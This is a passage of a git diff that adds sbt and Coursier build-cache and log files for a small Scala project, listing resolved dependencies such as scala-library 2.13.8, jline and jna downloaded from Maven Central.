ttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"test-internal"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"jar","extension":"jar","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]}],"stats":{"resolveTime":-1,"downloadTime":-1,"downloadSize":-1,"cached":false},"stamps":{}}
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/_global/csrLogger/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/_global/_global/csrLogger/_global/streams/out
new file mode 100644
index 00000000..82db3fc7
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/_global/_global/csrLogger/_global/streams/out
@@ -0,0 +1,21 @@
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.pom
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8.pom
+[debug] downloaded https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.9.0/jna-5.9.0.pom
+[debug] downloaded https://repo1.maven.org/maven2/org/jline/jline/3.21.0/jline-3.21.0.pom
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-reflect/2.13.8/scala-reflect-2.13.8.pom
+[debug] downloaded https://repo1.maven.org/maven2/org/jline/jline-parent/3.21.0/jline-parent-3.21.0.pom
+[debug] downloaded https://repo1.maven.org/maven2/org/jline/jline/3.21.0/jline-3.21.0.jar
+[debug] downloaded https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.9.0/jna-5.9.0.jar
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8.jar
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-reflect/2.13.8/scala-reflect-2.13.8.jar
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8.jar
+[debug] downloaded https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.9.0/jna-5.9.0-sources.jar
+[debug] downloaded https://repo1.maven.org/maven2/org/jline/jline/3.21.0/jline-3.21.0-sources.jar
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8-sources.jar
+[debug] downloaded https://repo1.maven.org/maven2/org/jline/jline/3.21.0/jline-3.21.0-javadoc.jar
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-reflect/2.13.8/scala-reflect-2.13.8-sources.jar
+[debug] downloaded https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.9.0/jna-5.9.0-javadoc.jar
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-reflect/2.13.8/scala-reflect-2.13.8-javadoc.jar
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8-javadoc.jar
+[debug] downloaded https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/_global/dumpStructure/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/_global/_global/dumpStructure/_global/streams/out
new file mode 100644
index 00000000..68ffea54
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/_global/_global/dumpStructure/_global/streams/out
@@ -0,0 +1,2 @@
+[info] Writing structure to /private/var/folders/y5/frw31bm163n6g_q9wz9qkmyc0000gn/T/sbt-structure.xml...
+[info] Done.
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/csrConfiguration/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/_global/csrConfiguration/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/csrProject/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/_global/csrProject/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.13/input_dsp b/JavaSecurity/JDK/Scala1/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.13/input_dsp
new file mode 100644
index 00000000..69acb19f
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.13/input_dsp
@@ -0,0 +1 @@
+-106189456
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.13/output_dsp b/JavaSecurity/JDK/Scala1/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.13/output_dsp
new file mode 100644
index 00000000..b0ae6329
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.13/output_dsp
@@ -0,0 +1 @@
+{"{\"organization\":\"org.scala-lang\",\"name\":\"scala-library\",\"revision\":\"2.13.8\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}}":{"value":{"$fields":["path","startLine"],"path":"(sbt.Classpaths.jvmBaseSettings) Defaults.scala","startLine":3407},"type":"LinePosition"}}
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/ivyConfiguration/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/_global/ivyConfiguration/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/ivySbt/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/_global/ivySbt/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/moduleSettings/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/_global/moduleSettings/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/projectDescriptors/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/_global/projectDescriptors/_global/streams/out
new file mode 100644
index 00000000..e69de29b
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/update/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/_global/update/_global/streams/out
new file mode 100644
index 00000000..dad971a5
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/_global/update/_global/streams/out
@@ -0,0 +1,3 @@
+[debug] not up to date. inChanged = true, force = false
+[debug] Updating ...
+[debug] Done updating 
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/updateClassifiers/_global/streams/out b/JavaSecurity/JDK/Scala1/target/streams/_global/updateClassifiers/_global/streams/out
new file mode 100644
index 00000000..0d834bb5
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/_global/updateClassifiers/_global/streams/out
@@ -0,0 +1,3 @@
+[debug] not up to date. inChanged = true, force = false
+[debug] Updating ProjectRef(uri("file:/Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/"), "root")...
+[debug] Done updating ProjectRef(uri("file:/Users/drunkbaby/Desktop/Codes/JavaSecurityLearning/JavaSecurity/JDK/Scala1/"), "root")
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/updateClassifiers/_global/streams/update_cache_2.13/inputs b/JavaSecurity/JDK/Scala1/target/streams/_global/updateClassifiers/_global/streams/update_cache_2.13/inputs
new file mode 100644
index 00000000..08e7b29c
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/_global/updateClassifiers/_global/streams/update_cache_2.13/inputs
@@ -0,0 +1 @@
+402252421
\ No newline at end of file
diff --git a/JavaSecurity/JDK/Scala1/target/streams/_global/updateClassifiers/_global/streams/update_cache_2.13/output b/JavaSecurity/JDK/Scala1/target/streams/_global/updateClassifiers/_global/streams/update_cache_2.13/output
new file mode 100644
index 00000000..b3eee7d7
--- /dev/null
+++ b/JavaSecurity/JDK/Scala1/target/streams/_global/updateClassifiers/_global/streams/update_cache_2.13/output
@@ -0,0 +1 @@
+{"cachedDescriptor":".","configurations":[{"configuration":{"name":"compile"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar"],[{"name":"scala-library","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"compile-internal"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar"],[{"name":"scala-library","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"docs"},"modules":[],"details":[]},{"configuration":{"name":"optional"},"modules":[],"details":[]},{"configuration":{"name":"plugin"},"modules":[],"details":[]},{"configuration":{"name":"pom"},"modules":[],"details":[]},{"configuration":{"name":"provided"},"modules":[],"details":[]},{"configuration":{"name":"runtime"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar"],[{"name":"scala-library","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"runtime-internal"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar"],[{"name":"scala-library","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"scala-doc-tool"},"modules":[],"details":[]},{"configuration":{"name":"scala-tool"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-compiler","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-compiler","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8-sources.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8-sources.jar"],[{"name":"scala-compiler","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8-javadoc.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-compiler","revision":"2.13.8","configurations":"optional","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-compiler","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8-sources.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8-sources.jar"],[{"name":"scala-compiler","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8-javadoc.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-compiler/2.13.8/scala-compiler-2.13.8-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-compiler/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar"],[{"name":"scala-library","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"optional","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar"],[{"name":"scala-library","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.scala-lang","name":"scala-reflect","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-reflect/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-reflect","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-reflect/2.13.8/scala-reflect-2.13.8-sources.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-reflect/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-reflect/2.13.8/scala-reflect-2.13.8-sources.jar"],[{"name":"scala-reflect","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-reflect/2.13.8/scala-reflect-2.13.8-javadoc.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-reflect/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-reflect/2.13.8/scala-reflect-2.13.8-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/scala-reflect/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]},{"module":{"organization":"org.jline","name":"jline","revision":"3.21.0","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"jline","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/jline/jline/3.21.0/jline-3.21.0-sources.jar","extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/jline/jline/3.21.0/jline-3.21.0-sources.jar"],[{"name":"jline","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/jline/jline/3.21.0/jline-3.21.0-javadoc.jar","extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/jline/jline/3.21.0/jline-3.21.0-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"extraAttributes":{},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[],"callers":[]},{"module":{"organization":"net.java.dev.jna","name":"jna","revision":"5.9.0","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"jna","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.9.0/jna-5.9.0-sources.jar","extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna/5.9.0/jna-5.9.0-sources.jar"],[{"name":"jna","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.9.0/jna-5.9.0-javadoc.jar","extraAttributes":{},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/net/java/dev/jna/jna/5.9.0/jna-5.9.0-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://github.com/java-native-access/jna","extraAttributes":{},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["LGPL-2.1-or-later","https://www.gnu.org/licenses/old-licenses/lgpl-2.1"],["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0.txt"]],"callers":[]}],"details":[]},{"configuration":{"name":"sources"},"modules":[],"details":[]},{"configuration":{"name":"test"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar"],[{"name":"scala-library","type":"doc","extension":"jar","classifier":"javadoc","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"allowInsecureProtocol":false},"file:///Users/drunkbaby/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-javadoc.jar"]],"missingArtifacts":[],"evicted":false,"homepage":"https://www.scala-lang.org/","extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"configurations":[{"name":"test"},{"name":"optional"},{"name":"compile"},{"name":"default"},{"name":"runtime"}],"licenses":[["Apache-2.0","https://www.apache.org/licenses/LICENSE-2.0"]],"callers":[]}],"details":[]},{"configuration":{"name":"test-internal"},"modules":[{"module":{"organization":"org.scala-lang","name":"scala-library","revision":"2.13.8","configurations":"default","isChanging":false,"isTransitive":true,"isForce":false,"explicitArtifacts":[],"inclusions":[],"exclusions":[],"extraAttributes":{"info.apiURL":"https://www.scala-lang.org/api/2.13.8/"},"crossVersion":{"type":"Disabled"}},"artifacts":[[{"name":"scala-library","type":"src","extension":"jar","classifier":"sources","configurations":[],"url":"https://repo1.maven.org/maven2/org/scala-lang/scala-library/2.13.8/scala-library-2.13.8-sources.jar","extraAttributes":{"info.apiURL":"https://www.s